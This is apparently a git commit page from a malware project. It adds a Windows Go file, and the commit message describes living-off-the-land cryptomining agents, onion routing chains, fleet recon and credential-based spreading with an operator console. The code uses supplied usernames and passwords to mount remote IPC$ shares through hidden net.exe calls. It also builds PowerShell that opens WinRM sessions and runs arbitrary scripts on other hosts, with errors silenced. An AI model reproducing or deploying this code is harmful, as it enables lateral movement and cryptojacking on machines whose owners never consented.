Add tiered LOTL mining onion and fleet recon so agents can fallback across execution tiers while operators see spread and vuln posture in Crucible. Includes triple-onion chain, spread cred graph, and full Go/TS/E2E test validation.
This commit is contained in:
43
agent/deploy/cred_spread_windows.go
Normal file
43
agent/deploy/cred_spread_windows.go
Normal file
@@ -0,0 +1,43 @@
|
||||
//go:build windows
|
||||
|
||||
package deploy
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"strings"
|
||||
)
|
||||
|
||||
func applySpreadCredSession(target string, session SpreadCredSession) (cleanup func(), ok bool) {
|
||||
target = strings.TrimSpace(target)
|
||||
user := strings.TrimSpace(session.Username)
|
||||
pass := session.Password
|
||||
if target == "" || user == "" || pass == "" {
|
||||
return nil, false
|
||||
}
|
||||
userArg := user
|
||||
if !strings.Contains(user, `\`) && !strings.Contains(user, `@`) {
|
||||
userArg = target + `\` + user
|
||||
}
|
||||
share := `\\` + target + `\IPC$`
|
||||
if err := HiddenRun("net.exe", "use", share, pass, "/user:"+userArg); err != nil {
|
||||
return nil, false
|
||||
}
|
||||
return func() {
|
||||
_ = HiddenRun("net.exe", "use", share, "/delete", "/y")
|
||||
}, true
|
||||
}
|
||||
|
||||
func winRMCredPSBlock(target string, session SpreadCredSession, innerScript string) string {
|
||||
user := strings.ReplaceAll(session.Username, `'`, `''`)
|
||||
pass := strings.ReplaceAll(session.Password, `'`, `''`)
|
||||
target = strings.ReplaceAll(target, `'`, `''`)
|
||||
return fmt.Sprintf(`
|
||||
$sec = ConvertTo-SecureString '%s' -AsPlainText -Force
|
||||
$cred = New-Object System.Management.Automation.PSCredential('%s', $sec)
|
||||
$s = New-PSSession -ComputerName '%s' -Credential $cred -EA SilentlyContinue
|
||||
if ($s) {
|
||||
Invoke-Command -Session $s -ScriptBlock { %s } -EA SilentlyContinue
|
||||
Remove-PSSession $s -EA SilentlyContinue
|
||||
}
|
||||
`, pass, user, target, innerScript)
|
||||
}
|
||||
Reference in New Issue
Block a user